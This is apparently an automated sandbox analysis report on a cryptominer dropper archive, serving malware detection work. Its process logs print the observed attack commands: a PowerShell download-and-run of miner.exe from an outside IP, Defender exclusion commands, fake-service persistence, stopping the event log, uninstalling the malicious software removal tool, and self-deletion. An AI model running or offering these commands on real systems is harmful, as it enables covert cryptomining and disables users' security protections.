Malware Analysis Report

2024-10-16 07:02

Sample ID 240610-by72wsag95
Target Miners.zip
SHA256 5777a295a10efd68effe3367a79f27e47622391cd2c8b66c01eaf8045f1e181c
Tags
themida execution evasion persistence upx trojan
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

5777a295a10efd68effe3367a79f27e47622391cd2c8b66c01eaf8045f1e181c

Threat Level: Likely malicious

The file Miners.zip was found to be: Likely malicious.

Malicious Activity Summary

themida execution evasion persistence upx trojan

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Creates new service(s)

Stops running service(s)

Command and Scripting Interpreter: PowerShell

UPX packed file

Checks BIOS information in registry

Themida packer

Checks whether UAC is enabled

Suspicious use of NtSetInformationThreadHideFromDebugger

Launches sc.exe

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-10 01:39

Signatures

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-10 01:34

Reported

2024-06-10 01:43

Platform

win10v2004-20240508-en

Max time kernel

0s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\UAC.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\UAC.exe

"C:\Users\Admin\AppData\Local\Temp\UAC.exe"

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionExtension 'exe' -ExclusionPath 'C:\Windows\System32\'

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue' ; Invoke-WebRequest "http://46.102.174.48/miner.exe" -OutFile 'C:\Windows\System32\msdr.exe'

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1308,i,6593821857742176458,13646536021844995125,262144 --variations-seed-version --mojo-platform-channel-handle=4020 /prefetch:8

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & 'C:\Windows\System32\msdr.exe'

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
ZA 46.102.174.48:80 tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp

Files

memory/2764-0-0x0000000072F4E000-0x0000000072F4F000-memory.dmp

memory/2764-1-0x0000000004EA0000-0x0000000004ED6000-memory.dmp

memory/2764-3-0x0000000072F40000-0x00000000736F0000-memory.dmp

memory/2764-2-0x0000000005550000-0x0000000005B78000-memory.dmp

memory/2764-4-0x0000000072F40000-0x00000000736F0000-memory.dmp

memory/2764-7-0x0000000005E20000-0x0000000005E86000-memory.dmp

memory/2764-17-0x0000000005F90000-0x00000000062E4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4lb2uovv.cu1.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2764-6-0x0000000005DB0000-0x0000000005E16000-memory.dmp

memory/2764-5-0x00000000054B0000-0x00000000054D2000-memory.dmp

memory/2764-18-0x0000000006460000-0x000000000647E000-memory.dmp

memory/2764-19-0x0000000006510000-0x000000000655C000-memory.dmp

memory/2764-41-0x00000000076F0000-0x0000000007793000-memory.dmp

memory/2764-40-0x0000000006A70000-0x0000000006A8E000-memory.dmp

memory/2764-30-0x000000006F830000-0x000000006F87C000-memory.dmp

memory/2764-43-0x00000000077A0000-0x00000000077BA000-memory.dmp

memory/2764-42-0x0000000007E20000-0x000000000849A000-memory.dmp

memory/2764-44-0x0000000007800000-0x000000000780A000-memory.dmp

memory/2764-29-0x0000000006A30000-0x0000000006A62000-memory.dmp

memory/2764-45-0x0000000007A10000-0x0000000007AA6000-memory.dmp

memory/2764-46-0x0000000007990000-0x00000000079A1000-memory.dmp

memory/2764-47-0x00000000079C0000-0x00000000079CE000-memory.dmp

memory/2764-49-0x0000000007AD0000-0x0000000007AEA000-memory.dmp

memory/2764-50-0x0000000007AB0000-0x0000000007AB8000-memory.dmp

memory/2764-48-0x00000000079D0000-0x00000000079E4000-memory.dmp

memory/2764-53-0x0000000072F40000-0x00000000736F0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 968cb9309758126772781b83adb8a28f
SHA1 8da30e71accf186b2ba11da1797cf67f8f78b47c
SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA512 4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 b6e440957cb681494b7ad917ecd9616e
SHA1 0edb2fbd702f145bce506045a8a95800eb0879f1
SHA256 f4e3c7aa4b570ad8a5d41715de790bb2f84cddc0f84d517aeffafdfce02acfbf
SHA512 d2e5a688a543096662b9759b8f9050909778fbe554ac8e36acc09f2ed7fde9c8f67a23e27c44983a3e75e3dab2fe3cd27da4f55047451571a446a115ea69912c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 fbe1aa3f8bdf9d881ee4239f0a312345
SHA1 d349eddcb4d23cf492e2c2deda377fea30f78322
SHA256 7d4348509f354f6485b64c7a8d3b626b30c9e15171e7a07eaa16e5df1c043146
SHA512 91f8ed461381d1c1f9896deddb2b7620d9f19eb4cb296e82f6e845e828132f27d0cac7e05190adc71e68b934f744c0841dd981c2dff27a4bd95429dbe76ee415

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-10 01:34

Reported

2024-06-10 01:43

Platform

win10v2004-20240508-en

Max time kernel

15s

Max time network

31s

Command Line

"C:\Users\Admin\AppData\Local\Temp\miner.exe"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe N/A

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\miner.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\miner.exe

"C:\Users\Admin\AppData\Local\Temp\miner.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"

C:\ProgramData\Google\Chrome\updater.exe

C:\ProgramData\Google\Chrome\updater.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0

C:\Windows\system32\powercfg.exe

C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

C:\Windows\system32\dialer.exe

dialer.exe

C:\Windows\system32\wusa.exe

wusa /uninstall /kb:890830 /quiet /norestart

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 randomxmonero.auto.nicehash.com udp
US 34.149.22.228:443 randomxmonero.auto.nicehash.com tcp
ZA 46.102.174.48:80 tcp
US 8.8.8.8:53 228.22.149.34.in-addr.arpa udp

Files

memory/2184-0-0x00007FFB42693000-0x00007FFB42695000-memory.dmp

memory/2184-10-0x000002306B8A0000-0x000002306B8C2000-memory.dmp

memory/2184-11-0x00007FFB42690000-0x00007FFB43151000-memory.dmp

memory/2184-12-0x00007FFB42690000-0x00007FFB43151000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hqi4cd1s.quy.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2184-15-0x00007FFB42690000-0x00007FFB43151000-memory.dmp

memory/1996-26-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1016-41-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

C:\ProgramData\Google\Chrome\updater.exe

MD5 6c8df1dac309514d1cf281d002cba82e
SHA1 6278823628b689b8cd1a63ddb75f596c10ad79cc
SHA256 d570edf6be963fa52770bbf968f0adde34ae5ed01533817d9a28a04e9b469458
SHA512 333145ee62ab3eebdc992d150e8f8b78a7dabcf2c67da8dda22b083826ac55502c32618a6fe08421e0eab274a4660bb8692343a05d2f0c58882631b502f7ae1b

memory/1016-40-0x000002F360AA0000-0x000002F360ACB000-memory.dmp

C:\ProgramData\Google\Chrome\updater.exe

MD5 2a6e21645cd671e4d7d4c68611258396
SHA1 28be0c90f4730d95f314f2d572823ab32d026458
SHA256 7945ece0e2807be03347cf07149ddff5a0f0f8891b8709cf9958072f19001d53
SHA512 606d8f0b4b329586d91d3444f614a1595fa46bda03f232d336dcbe9e7656a473ccafd8ee06564b4aa8e00dba507c9ff7b3fc68b61c443c766d62e5711783095f

memory/612-35-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

memory/612-34-0x0000016316880000-0x00000163168AB000-memory.dmp

memory/664-32-0x00007FFB21850000-0x00007FFB21860000-memory.dmp

memory/612-29-0x00000163167E0000-0x0000016316804000-memory.dmp

memory/4688-320-0x000001A3F2900000-0x000001A3F29B5000-memory.dmp

memory/4688-319-0x000001A3F28E0000-0x000001A3F28FC000-memory.dmp

memory/4688-321-0x000001A3F1C10000-0x000001A3F1C1A000-memory.dmp

memory/4688-322-0x000001A3F2B20000-0x000001A3F2B3C000-memory.dmp

memory/664-31-0x000001E9372F0000-0x000001E93731B000-memory.dmp

memory/4688-323-0x000001A3F2B00000-0x000001A3F2B0A000-memory.dmp

memory/4688-325-0x000001A3F2B10000-0x000001A3F2B18000-memory.dmp

memory/4688-327-0x000001A3F2B50000-0x000001A3F2B5A000-memory.dmp

memory/4688-326-0x000001A3F2B40000-0x000001A3F2B46000-memory.dmp

C:\Windows\system32\drivers\etc\hosts

MD5 00930b40cba79465b7a38ed0449d1449
SHA1 4b25a89ee28b20ba162f23772ddaf017669092a5
SHA256 eda1aae2c8fce700e3bdbe0186cf3db88400cf0ac13ec736e84dacba61628a01
SHA512 cbe4760ec041e7da7ab86474d5c82969cfccb8ccc5dbdac9436862d5b1b86210ab90754d3c8da5724176570d8842e57a716a281acba8719e90098a6f61a17c62

memory/4688-324-0x000001A3F2B60000-0x000001A3F2B7A000-memory.dmp

memory/1996-23-0x00007FFB617D0000-0x00007FFB619C5000-memory.dmp

memory/1996-19-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1996-18-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1996-17-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1996-24-0x00007FFB5F820000-0x00007FFB5F8DE000-memory.dmp

memory/1996-22-0x0000000140000000-0x000000014002B000-memory.dmp

memory/1996-20-0x0000000140000000-0x000000014002B000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-10 01:34

Reported

2024-06-10 01:43

Platform

win10v2004-20240426-en

Max time kernel

5s

Max time network

20s

Command Line

"C:\Users\Admin\AppData\Local\Temp\putty.exe"

Signatures

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4536 wrote to memory of 1144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe
PID 4536 wrote to memory of 1144 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\choice.exe

Processes

C:\Users\Admin\AppData\Local\Temp\putty.exe

"C:\Users\Admin\AppData\Local\Temp\putty.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "CGMNDIHH"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "CGMNDIHH"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\putty.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 de-zephyr.miningocean.org udp
DE 162.19.241.67:5342 de-zephyr.miningocean.org tcp
US 8.8.8.8:53 67.241.19.162.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp

Files

memory/4692-10-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4464-13-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-18-0x0000000000560000-0x0000000000580000-memory.dmp

memory/4464-22-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-23-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-21-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-19-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-20-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-17-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-15-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-16-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-14-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-11-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-12-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4692-7-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4692-6-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4692-5-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4692-4-0x0000000140000000-0x000000014000D000-memory.dmp

memory/4692-3-0x0000000140000000-0x000000014000D000-memory.dmp

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

MD5 226477a027b7fc61f6f1bfab1bb469e3
SHA1 fd42239a9149e85e113760b0f9a9a713e08a1522
SHA256 2eb6619c54344cd103c43430f87df4cb00cb3fb7fdc62b55e2a113a4ddec58ef
SHA512 da29f76f783d9064d6dc16d79557dc4f1ec5d286506c961bbd23b37f1dde1df4ec7f8817aa0aeccc3cc3ff7990b167a6577d5c823ae87548d30c5a0ffd36dd13

memory/4464-26-0x00000000005A0000-0x00000000005C0000-memory.dmp

memory/4464-24-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-27-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-29-0x0000000140000000-0x0000000140848000-memory.dmp

memory/4464-31-0x0000000000FE0000-0x0000000001000000-memory.dmp

memory/4464-32-0x0000000011380000-0x00000000113A0000-memory.dmp

memory/4464-28-0x0000000140000000-0x0000000140848000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-10 01:34

Reported

2024-06-10 01:43

Platform

win10v2004-20240508-en

Max time kernel

5s

Max time network

32s

Command Line

"C:\Users\Admin\AppData\Local\Temp\update.exe"

Signatures

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Creates new service(s)

persistence execution

Stops running service(s)

evasion execution

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\update.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\update.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\update.exe

"C:\Users\Admin\AppData\Local\Temp\update.exe"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe delete "CGMNDIHH"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe create "CGMNDIHH" binpath= "C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe" start= "auto"

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe stop eventlog

C:\Windows\system32\sc.exe

C:\Windows\system32\sc.exe start "CGMNDIHH"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\update.exe"

C:\Windows\system32\choice.exe

choice /C Y /N /D Y /T 3

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\conhost.exe

C:\Windows\explorer.exe

explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 de-zephyr.miningocean.org udp
DE 162.19.241.67:5342 de-zephyr.miningocean.org tcp
US 8.8.8.8:53 67.241.19.162.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp

Files

memory/2012-1-0x00007FFDCC4D0000-0x00007FFDCC4D2000-memory.dmp

memory/2012-4-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

memory/2012-3-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

memory/2012-2-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

memory/2012-0-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

memory/2012-6-0x00007FF6ACBD0000-0x00007FF6AD6F3000-memory.dmp

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

MD5 c69337e51b250b87b474867376cdb707
SHA1 4642f2eb7dfe64b4f934d9829caf4833647c265c
SHA256 ac095c35dc6e044530c4b9024eb8a6ecea122be06dab5b17c1e5fc04b9d342f8
SHA512 e8c85717f2d47c69ad74eb884d2cb513c9c2c2842e148b406ce634e2b02dcc637122e31a330345310a88c7f8287b3c47b3cbcd7c6e03a73549563d37b220bb09

C:\ProgramData\rdytutcdlfrg\uxtldsktkgfv.exe

MD5 338cb476917c2fdaced336fd8ba5c4b8
SHA1 bcc7b4ec89555e7eb9aa1ed4724b00b8f490ac0b
SHA256 e4211f8b50df08971e33139ff338e3914e76d81331aaf2a022795d8c443e2d7d
SHA512 aa88e25df77917a0e22b1688a2814712ae5f8f7250b70032ca59a4ea4999ad111113c4ff310786e2a69d0ed6ca6884d8436b60d8eee62c2e080ee7411165e49c

memory/1380-10-0x00007FFDCC430000-0x00007FFDCC625000-memory.dmp

memory/1380-9-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/2560-21-0x0000000140000000-0x000000014000D000-memory.dmp

memory/1376-24-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-29-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-36-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-32-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-35-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-34-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-33-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-31-0x0000000001130000-0x0000000001150000-memory.dmp

memory/1376-30-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-27-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1380-28-0x00007FFDCC430000-0x00007FFDCC625000-memory.dmp

memory/1380-26-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/1376-25-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-22-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-23-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1380-13-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/1380-12-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/2560-18-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2560-17-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2560-16-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2560-15-0x0000000140000000-0x000000014000D000-memory.dmp

memory/2560-14-0x0000000140000000-0x000000014000D000-memory.dmp

memory/1380-11-0x00007FF698460000-0x00007FF698F83000-memory.dmp

memory/1376-37-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-39-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-40-0x0000000140000000-0x0000000140848000-memory.dmp

memory/1376-41-0x0000000140000000-0x0000000140848000-memory.dmp